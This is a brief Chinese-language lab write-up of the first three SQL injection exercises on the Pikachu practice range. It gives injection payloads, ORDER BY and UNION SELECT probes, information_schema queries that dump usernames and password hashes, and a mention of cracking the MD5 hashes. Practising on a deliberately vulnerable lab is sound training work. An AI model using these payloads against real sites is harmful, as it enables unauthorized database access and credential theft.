pikachu靶场之SQL注入(1-3)
1.数字型注入
看题目知道了第一题是数字型注入,下拉框选择,抓个包试试,看来是post,这里我用的是burp。
方便测试,放到repeater里面。
先试一试出列表1 or 1 --+
,出结果了。
order by试出来了是2,然后是union select看回显。
然后按流程来,查库,查表,查字段。
select group_concat(schema_name) from information_schema.schemata
select group_concat(table_name) from information_schema.tables where table_schema='pikachu'
select group_concat(column_name) from information_schema.columns where table_name='users'
select group_concat(username) from pikachu.users
select group_concat(password) from pikachu.users
发现密码是md5加密的,直接上cmd5查就好啦。
2.字符型注入
首先试了1'
,发现报错信息了。然后1' or 1 #
,发现出结果了。
后面和第一个数值型一样了,先order by,然后union select,然后查库、查表、查字段、查值。
这里就不赘述了。
3.搜索型注入
先试了a'
,报错了,然后是a' or 1#
,出结果了。
然后又和上面一样了,a' union select (select group_concat(column_name) from information_schema.columns where table_name='users'),(select group_concat(username) from pikachu.users),(select group_concat(password) from pikachu.users)#
这里不说了。放一张结果图吧。